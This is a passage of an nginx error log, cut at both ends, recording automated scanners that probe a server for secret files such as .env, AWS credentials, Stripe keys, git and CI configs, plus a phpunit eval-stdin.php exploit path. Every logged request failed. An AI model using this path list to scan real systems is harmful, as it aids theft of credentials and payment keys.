such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/chakaash.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:16 [error] 305#305: *90847 open() "/var/www/html/my_env/newsletter.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/newsletter.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:16 [error] 305#305: *90847 open() "/var/www/html/my_env/palash.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/palash.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/config/settings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/config/settings.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.local HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/.circleci/configs/development.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/configs/development.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/config/settings.prod" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.prod HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/app/config/parameters.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:17 [error] 305#305: *90847 open() "/var/www/html/config/parameters.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/.AWS_/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.AWS_/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/config/local.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/local.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/backend/config/settings.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/settings.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/api/config/config.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/config/config.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/admin/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/.travis.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.travis.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 305#305: *90847 open() "/var/www/html/aws.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 307#307: *96792 open() "/var/www/html/sms.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /sms.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 307#307: *96792 open() "/var/www/html/config/config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/config.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:19 [error] 307#307: *96792 open() "/var/www/html/main.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /main.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:21 [error] 307#307: *96793 open() "/var/www/html/debug/default/view" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /debug/default/view HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:21 [error] 307#307: *96793 open() "/var/www/html/aws/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:21 [error] 307#307: *96793 open() "/var/www/html/.aws/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.aws/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:22 [error] 307#307: *96793 open() "/var/www/html/config/stripe.ts" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.ts HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:24 [error] 307#307: *96793 open() "/var/www/html/api/stripe.ts" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/stripe.ts HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:29 [error] 306#306: *116112 open() "/var/www/html/config/services.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/services.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119085 open() "/var/www/html/config/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119085 open() "/var/www/html/app/Services/StripeService.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/Services/StripeService.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119085 open() "/var/www/html/app/Http/Controllers/StripeController.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/Http/Controllers/StripeController.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/bootstrap/cache/config.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /bootstrap/cache/config.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/storage/app/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/app/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/storage/app/keys/stripe.key" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/app/keys/stripe.key HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/app/config/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/app/config/payment.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/payment.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/config/settings/stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings/stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119086 open() "/var/www/html/settings_stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings_stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/app/settings_stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/settings_stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/project/settings/payment.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /project/settings/payment.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/core/payment.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /core/payment.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/secrets/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /secrets/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/instance/config.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /instance/config.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/initializers/stripe.rb" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/initializers/stripe.rb HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/secrets.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/secrets.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/credentials.yml.enc" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/credentials.yml.enc HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/payment.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/payment.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:30 [error] 307#307: *119087 open() "/var/www/html/config/stripe.yaml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/internal/stripe/keys.go" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /internal/stripe/keys.go HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.github/workflows/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.github/workflows/deploy.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/deploy.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.github/workflows/build.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/build.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.github/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.gitlab-ci.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab-ci.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.circleci/config.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/config.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119088 open() "/var/www/html/.bitbucket/pipelines.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.bitbucket/pipelines.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:31 [error] 307#307: *119089 open() "/var/www/html/config/webhook.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/webhook.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:33 [error] 307#307: *119089 open() "/var/www/html/webhook/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /webhook/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:33 [error] 307#307: *119089 open() "/var/www/html/webhooks/settings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /webhooks/settings.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:33 [error] 307#307: *119089 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:33 [error] 307#307: *119089 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:33 [error] 307#307: *119089 open() "/var/www/html/composer.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /composer.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *119089 open() "/var/www/html/package.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /package.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/requirements.txt" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /requirements.txt HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/Gemfile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Gemfile HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/pom.xml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /pom.xml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/.dockerignore" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.dockerignore HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/Dockerfile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Dockerfile HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 "/var/www/html/.github/workflows/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 "/var/www/html/terraform/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /terraform/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 "/var/www/html/.terraform/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.terraform/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/docker-compose.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/Makefile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Makefile HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/tox.ini" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /tox.ini HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/setup.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /setup.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/gradle.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /gradle.properties HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/build.gradle" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /build.gradle HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:34 [error] 307#307: *123548 open() "/var/www/html/settings.gradle" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings.gradle HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/SonarQube.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /SonarQube.properties HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/sonar-project.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /sonar-project.properties HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/config/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/config/services/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/services/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/settings/stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings/stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/config/credentials.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/credentials.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/storage/logs/stripe.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/stripe.log HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/storage/logs/payments.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/payments.log HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/backup/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backup/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:35 [error] 307#307: *123549 open() "/var/www/html/stripe.backup" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.backup HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:36 [error] 307#307: *123550 open() "/var/www/html/stripe.old" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.old HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:36 [error] 307#307: *123550 open() "/var/www/html/stripe.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.bak HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123551 open() "/var/www/html/.env.stripe" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.stripe HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/terraform/stripe.tf" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /terraform/stripe.tf HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.terraform/stripe.tfstate" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.terraform/stripe.tfstate HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/config/s3_config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/s3_config.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.github/secrets/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/secrets/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.gitlab/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.gitlab-ci/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab-ci/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/.circleci/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/storage/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/storage/stripe.keys" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/stripe.keys HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/storage/keys/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/keys/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:00:37 [error] 307#307: *123552 open() "/var/www/html/storage/secrets/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/secrets/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:17:51 [error] 307#307: *123556 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.38.33.240, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "92.249.249.197" +2026/01/15 07:24:32 [error] 308#308: *123557 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 07:32:48 [error] 308#308: *123559 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.191, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 08:06:49 [error] 308#308: *123638 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 109.199.104.175, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 09:10:58 [error] 305#305: *123652 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 09:56:58 [error] 305#305: *123664 open() "/var/www/html/.env" failed (2: No such file or directory), client: 188.166.158.67, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 09:56:58 [error] 306#306: *123665 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 188.166.158.67, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:28 [error] 306#306: *123666 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:28 [error] 306#306: *123667 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:28 [error] 306#306: *123668 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:28 [error] 306#306: *123669 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:28 [error] 306#306: *123670 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123671 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123673 open() "/var/www/html/Backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /Backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123674 open() "/var/www/html/Application/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /Application/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123675 open() "/var/www/html/sendgrid/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sendgrid/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123676 open() "/var/www/html/staging.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /staging.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123677 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:29 [error] 306#306: *123678 open() "/var/www/html/php-info" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /php-info HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:30 [error] 306#306: *123679 open() "/var/www/html/services/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /services/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:30 [error] 307#307: *123680 open() "/var/www/html/config/secrets.yml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/secrets.yml HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:30 [error] 307#307: *123681 open() "/var/www/html/admin/info.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:31 [error] 308#308: *125169 open() "/var/www/html/env.json" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /env.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:31 [error] 305#305: *125170 open() "/var/www/html/core/.env.prod" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /core/.env.prod HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:31 [error] 305#305: *125171 open() "/var/www/html/uploads/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /uploads/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:31 [error] 305#305: *125172 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: 